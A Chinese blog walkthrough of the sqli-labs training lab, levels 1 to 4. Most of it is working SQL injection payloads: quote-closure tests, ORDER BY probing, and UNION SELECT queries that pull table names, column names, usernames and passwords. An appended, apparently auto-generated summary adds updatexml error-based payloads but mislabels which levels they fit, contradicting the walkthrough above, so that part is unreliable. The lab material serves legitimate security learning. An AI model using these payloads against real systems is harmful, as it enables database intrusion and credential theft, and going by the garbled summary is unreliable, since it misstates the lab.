sqli-labs通关攻略(1-4关)

一、less-1

1、题目的意思是:请输入一个ID作为参数,并且输入一个数值

2、利用“?”来进行传参(下图,传参成功)

3、判断注入类型以及闭合方式

?id=1 and 2=2   #正常
?id=1 and 1=2   #正常   说明一定不是数字型注入,考虑其他注入方式
?id=1'          #报错   可能是字符型注入
?id=1'--+       #正常   输入注释符号--+闭合成功,是字符型注入

4、确定字段数量(用二分法)

?id=1' order by 4 --+   #报错,说明字段数量不是4
?id=1' order by 3 --+   #不报错,说明字段数量是3

5、确定回显点

?id=-1' union select 1,2,3 --+   #可以看到输出显示的字段为2和3

6、确定数据库名

可以看到数据库的名字为security

7、确定数据库里所有的表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

8、找到里面重要的表进行查询字段,这里我们查询users表的字段

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

9、查询所有字段的数据

?id=-1' union select 1,2,group_concat(id,'-',username,'-',password) from users--+

二、less-2

1、判断注入类型

?id=1'  #报错,不是字符型注入
?id=1 and 1=1  #正常
?id=1 and 1=2  #报错(空白界面)
确定为数字型注入

2、判断字段数量

?id=1 order by 4    #报错,说明没有四个字段
?id=1 order by 3    #正常,说明有三个字段

3、确定回显点

?id=-1 union select 1,2,3   #正常,确定了回显点为2和3

4、爆破库名

?id=-1 union select 1,2,database()

5、爆破表名

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'

6、爆破字段名

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users' 

 7、爆破数据

?id=-1 union select 1,2,group_concat(username,'~',password)from users

三、less-3

1、判断注入类型

?id=1'  #报错说明有可能是他的闭合方式
?id=1' --+   #报错,说明不是他的闭合方式
?id=1"  #正常,说明不是他的闭合方式
?id=1')  #报错,说明有可能是他的闭合方式
?id=1') --+   #没报错,说明就是他的闭合方式,为字符型注入

2、确定字段数量

?id=1') order by 4 --+   #报错,说明字段数量不是4
?id=1') order by 3 --+   #不报错,说明字段数量是3

3、确定回显点

?id=-1') union select 1,2,3 --+   #可以看到输出显示的字段为2和3

4、爆破库名

?id=-1') union select 1,2,database() -++   #可以看到库名为security

5、爆破表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+   #可以看到表名都出现了

6、爆破字段名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+    #可以看到字段名已经出现了

7、爆破数据

?id=-1') union select 1,2,group_concat(username,'~',password) from users --+
爆破成功

四、less-4

1、判断注入类型

?id=1 and 1=1   #没报错,说明有可能他的注入方式为数字型
?id=1 and 1=2   #没报错,说明他的注入方式不是数字型,可能是字符型
?id=1'          #没报错,说明这不是他的闭合方式
?id=1"          #报错,说明有可能是他的闭合方式
?id=1" --+      #报错,说明不是他的闭合方式
?id=1")         #报错,说明有可能是他的闭合方式
?id=1") --+     #没报错,说明这就是他的闭合方式,并且是字符型注入

2、确定字段数量

?id=1") order by 4 --+   #报错,说明字段数量不是4
?id=1") order by 3 --+   #不报错,说明字段数量是3

3、确定回显点

?id=-1") union select 1,2,3 --+   #可以看到输出显示的字段为2和3

4、爆破库名

?id=-1") union select 1,2,database() --+   #可以看到库名为security

5、爆破表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+   #可以看到表名都出现了

6、爆破字段名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+    #可以看到字段名已经出现了

7、爆破数据

?id=-1") union select 1,2,group_concat(username,'~',password) from users --+
爆破成功

sqli-labs是一个SQL注入学习平台,通过完成一系列的卡来学习和实践SQL注入漏洞的利用方法。根据引用的描述,首先需要在浏览器中打开"http://127.0.0.1/sqli-labs/",访问平台的首页。然后点击"Setup/reset Database"按钮以创建数据库,创建表并填充数据。 完成了上述设置后,可以开始挑战卡。 sqli-labs通关1:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关2:根据引用提供的内容,可以在账户密码后面加入"1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#"来进行注入。这样就能够获取到users表中的用户名和密码的组合。 sqli-labs通关3通关3的方法没有在提供的引用中找到相信息。 sqli-labs通关4:根据引用提供的内容,可以在URL中加入"?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(password,username) from users),0x5c),1))"来进行注入。这样就能够获取到users表中的密码和用户名的组合。 sqli-labs通关5通关5的方法没有在提供的引用中找到相信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [详细sqli-labs1-65)通关讲解](https://blog.youkuaiyun.com/dreamthe/article/details/123795302)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [Sqli-labs通关全解---Sqli-lab--1](https://blog.youkuaiyun.com/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值